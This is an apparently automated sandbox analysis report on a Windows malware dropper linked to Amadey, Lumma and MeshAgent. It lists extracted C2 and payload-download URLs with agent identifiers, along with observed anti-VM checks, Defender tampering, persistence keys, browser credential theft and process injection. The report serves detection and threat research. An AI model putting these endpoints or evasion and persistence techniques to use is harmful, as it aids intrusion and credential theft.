Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system -
submitted
04/04/2025, 23:56
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250313-en
General
-
Target
2025-04-04_cfe0e2ed11826a17b1d265a55fb70ba9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
cfe0e2ed11826a17b1d265a55fb70ba9
-
SHA1
538627bfcde18a97ffcf81f8646ccec718b73f83
-
SHA256
e0388c4c09e670a6b8b28f2edd5035425456828dbf0bd99fd21b3adccb927fd3
-
SHA512
0bb7137db098cd950c71a724f86d1c7a4e0e9e1d66d60d4c2f9bcaa527a6b8e4bf8d551572a3f7349a36c75dc92448031655adf30ea5234013ed925fe67eea88
-
SSDEEP
24576:oqDEvCTbMWu7rQYlBQcBiT6rprG8a0Ju:oTvC/MTQYxsWR7a0J
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://krxspint.digital/kendwz
https://jrxsafer.top/shpaoz
https://rhxhube.run/pogrs
https://ogrxeasyw.digital/xxepw
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://xrfxcaseq.live/gspaz
https://ywmedici.top/noagis
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://wstarcloc.bet/GOksAo
https://atargett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://iplpepperiop.digital/oage
https://plantainklj.run/opafg
https://puerrogfh.live/iqwez
https://quavabvc.top/iuzhd
https://rambutanvcx.run/adioz
Extracted
meshagent
2
test123
http://aaso12.duckdns.org:443/agent.ashx
-
mesh_id
0x0CF4A8B0663DD2F1D3A44CE8D231621166DBDB1E723B374C911544DE2F45A87C6C52F7206CED32F5B6A52A5551B75A3C
-
server_id
22F126392DFCD804B6AF755F256A707D53ED8D200650E6BC853C95860F21B6B7049AF4EBEAB393E6EE1A9315B396BFC8
-
wss
wss://aaso12.duckdns.org:443/agent.ashx
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/4672-8413-0x0000000000C50000-0x00000000010B2000-memory.dmp healer behavioral1/memory/4672-8411-0x0000000000C50000-0x00000000010B2000-memory.dmp healer behavioral1/memory/4672-9655-0x0000000000C50000-0x00000000010B2000-memory.dmp healer -
Detects MeshAgent payload 1 IoCs
resource yara_rule behavioral1/files/0x000d00000002404f-3029.dat family_meshagent -
Healer family
-
Lumma family
-
Meshagent family
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Contacts a large (6666) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dc6b7a79b8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3d6c756052.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4c8c26e4ba.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempSUEV9JCXILJMGKFVKDH5JEUYLPMFSTIH.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c3842a84fc.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 22 1100 powershell.exe 224 1496 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 1496 powershell.exe 1100 powershell.exe 2712 powershell.exe 5528 powershell.exe 4912 powershell.exe 1744 powershell.exe 4020 powershell.exe 920 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 16 IoCs
flow pid Process 58 2816 rapes.exe 213 5036 futors.exe 74 2816 rapes.exe 74 2816 rapes.exe 74 2816 rapes.exe 22 1100 powershell.exe 224 1496 powershell.exe 404 2816 rapes.exe 467 5036 futors.exe 540 2816 rapes.exe 540 2816 rapes.exe 79 5036 futors.exe 34 2816 rapes.exe 113 5036 futors.exe 113 5036 futors.exe 113 5036 futors.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 3928 takeown.exe 544 icacls.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" " s.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 20 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 37168 chrome.exe 37072 chrome.exe 1980 chrome.exe 3076 msedge.exe 31720 chrome.exe 37176 chrome.exe 31356 chrome.exe 4892 chrome.exe 1552 chrome.exe 5456 chrome.exe 5568 msedge.exe 224 msedge.exe 6616 msedge.exe 652 chrome.exe 5768 msedge.exe 2372 msedge.exe 1716 msedge.exe 6412 msedge.exe 1652 msedge.exe 2668 msedge.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3d6c756052.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4c8c26e4ba.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4f64c61f7f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempSUEV9JCXILJMGKFVKDH5JEUYLPMFSTIH.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempSUEV9JCXILJMGKFVKDH5JEUYLPMFSTIH.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c3842a84fc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dc6b7a79b8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dc6b7a79b8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3d6c756052.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4c8c26e4ba.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4f64c61f7f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c3842a84fc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation 272.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation 272.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation 9b5f01d4a1.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation Amadey.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE -
Executes dropped EXE 39 IoCs
pid Process 3128 TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE 2816 rapes.exe 3528 Mbxp0H9.exe 3784 3FKgMSQ1MX.exe 5588 kW3p2yUtCo.exe 5432 3FKgMSQ1MX.exe 5584 7q8Wm5h.exe 4796 apple.exe 652 272.exe 3524 272.exe 6140 amnew.exe 5036 futors.exe 3168 rapes.exe 3664 futors.exe 5320 trOUuPI.exe 5028 MeshAgent.exe 3672 v7942.exe 3488 alex12312321.exe 4016 IsValueCreated.exe 812 UU0LfLZ.exe 3468 legendarik.exe 2612 e2bf8bc9ca.exe 2376 9b5f01d4a1.exe 2068 TempSUEV9JCXILJMGKFVKDH5JEUYLPMFSTIH.EXE 4776 c3842a84fc.exe 2104 crypted.exe 5244 Amadey.exe 2888 tgvazx.exe 5564 Constraints.com 672 b07dfdddb1.exe 3356 svchost015.exe 4900 dc6b7a79b8.exe 5148 3d6c756052.exe 5628 522e881ea4.exe 1540 4c8c26e4ba.exe 5092 svchost015.exe 1980 svchost015.exe 3404 svchost015.exe 5432 4f64c61f7f.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine dc6b7a79b8.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 3d6c756052.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 4c8c26e4ba.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine TempSUEV9JCXILJMGKFVKDH5JEUYLPMFSTIH.EXE Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine c3842a84fc.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 3928 takeown.exe 544 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dc6b7a79b8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10051520101\\dc6b7a79b8.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\522e881ea4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10051530101\\522e881ea4.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4c8c26e4ba.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10453920101\\4c8c26e4ba.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4f64c61f7f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10453930101\\4f64c61f7f.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1096 ip-api.com -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000024452-4114.dat autoit_exe behavioral1/files/0x00020000000231f8-8118.dat autoit_exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\System32\dll\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\ntasn1.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\9D237E30992D7ED2113730F250567E94D9FA8BE7 MeshAgent.exe File opened for modification C:\Windows\System32\apphelp.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\System32\ole32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\bcryptprimitives.pdb MeshAgent.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\9D237E30992D7ED2113730F250567E94D9FA8BE7 MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\dll\kernelbase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\gdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\System32\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\System32\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\System32\Kernel.Appcore.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\BABBEC3DB7C16C501B63DD806F2DFA2A0661D693 MeshAgent.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\0BFAC4DBC5A80BC20A6E0ACB40287750D5E6F712 MeshAgent.exe File opened for modification C:\Windows\System32\symbols\exe\MeshService64.pdb MeshAgent.exe File opened for modification C:\Windows\System32\kernel32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\user32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\ole32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\DLL\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys MeshAgent.exe File opened for modification C:\Windows\System32\exe\MeshService64.pdb MeshAgent.exe File opened for modification C:\Windows\System32\ntdll.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\ntdll.pdb MeshAgent.exe File opened for modification C:\Windows\System32\win32u.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\ole32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\DLL\kernel32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\kernelbase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\gdi32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\gdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\gdi32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\System32\DLL\bcrypt.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\A2CC7959DFC6A10848FCFEDB7EA8FA1C868A19C5 MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\dll\ntdll.pdb MeshAgent.exe File opened for modification C:\Windows\System32\kernelbase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\apphelp.pdb MeshAgent.exe File opened for modification C:\Windows\System32\bcryptprimitives.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\gdi32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\ws2_32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\System32\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\combase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\win32u.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\advapi32.pdb MeshAgent.exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 2480 tasklist.exe 2416 tasklist.exe 12396 tasklist.exe 10140 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 3128 TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE 2816 rapes.exe 3168 rapes.exe 2068 TempSUEV9JCXILJMGKFVKDH5JEUYLPMFSTIH.EXE 4776 c3842a84fc.exe 4900 dc6b7a79b8.exe 5148 3d6c756052.exe 1540 4c8c26e4ba.exe -
Suspicious use of SetThreadContext 11 IoCs
description pid Process procid_target PID 3528 set thread context of 5036 3528 Mbxp0H9.exe 105 PID 5320 set thread context of 5332 5320 trOUuPI.exe 206 PID 3672 set thread context of 6032 3672 v7942.exe 209 PID 3488 set thread context of 4944 3488 alex12312321.exe 213 PID 3468 set thread context of 2448 3468 legendarik.exe 237 PID 2104 set thread context of 3028 2104 crypted.exe 265 PID 672 set thread context of 3356 672 b07dfdddb1.exe 287 PID 4900 set thread context of 5092 4900 dc6b7a79b8.exe 293 PID 5148 set thread context of 1980 5148 3d6c756052.exe 294 PID 5628 set thread context of 3404 5628 522e881ea4.exe 295 PID 4016 set thread context of 2396 4016 IsValueCreated.exe 296 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File created C:\Program Files\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File created C:\Program Files\Mesh Agent\MeshAgent.msh MeshAgent.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File created C:\Program Files\Mesh Agent\MeshAgent.exe s.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File created C:\Program Files\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe -
Drops file in Windows directory 16 IoCs
description ioc Process File opened for modification C:\Windows\LocksWisconsin 9b5f01d4a1.exe File created C:\Windows\Tasks\futors.job amnew.exe File opened for modification C:\Windows\LimeNirvana 9b5f01d4a1.exe File opened for modification C:\Windows\ExceedExec 9b5f01d4a1.exe File opened for modification C:\Windows\AndorraPrint 9b5f01d4a1.exe File opened for modification C:\Windows\ZuMiller 9b5f01d4a1.exe File opened for modification C:\Windows\CongressJvc 9b5f01d4a1.exe File opened for modification C:\Windows\MadnessSet 9b5f01d4a1.exe File opened for modification C:\Windows\SyntheticLil 9b5f01d4a1.exe File opened for modification C:\Windows\DealersFocuses 9b5f01d4a1.exe File opened for modification C:\Windows\AucklandChef 9b5f01d4a1.exe File opened for modification C:\Windows\DependMedication 9b5f01d4a1.exe File created C:\Windows\Tasks\tgvazx.job Amadey.exe File created C:\Windows\Tasks\rapes.job TempCDSFEWFHOH5BJ2FUVZU9RGVKKEKJDMKI.EXE File opened for modification C:\Windows\PolarRail 9b5f01d4a1.exe File opened for modification C:\Windows\NewcastlePeripherals 9b5f01d4a1.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4404 sc.exe 5788 sc.exe 512 sc.exe 3284 sc.exe 5608 sc.exe 5072 sc.exe 4544 sc.exe 4532 sc.exe 5800 sc.exe 3000 sc.exe 6064 sc.exe 5812 sc.exe 2936 sc.exe 592 sc.exe 2668 sc.exe 4636 sc.exe 4272 sc.exe 5424 sc.exe 2056 sc.exe 1472 sc.exe 4556 sc.exe 412 sc.exe 4700 sc.exe 1980 sc.exe 1736 sc.exe 4592 sc.exe 5692 sc.exe 5720 sc.exe 932 sc.exe 5236 sc.exe 2208 sc.exe 3844 sc.exe 6096 sc.exe 1916 sc.exe 4740 sc.exe 5304 sc.exe 4960 sc.exe 5092 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 14848 16160 WerFault.exe 382 19192 2936 WerFault.exe 373 30008 4596 WerFault.exe 371 31360 24932 WerFault.exe 402 -
System Location Discovery: System Language Discovery 1 TTPs 53 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
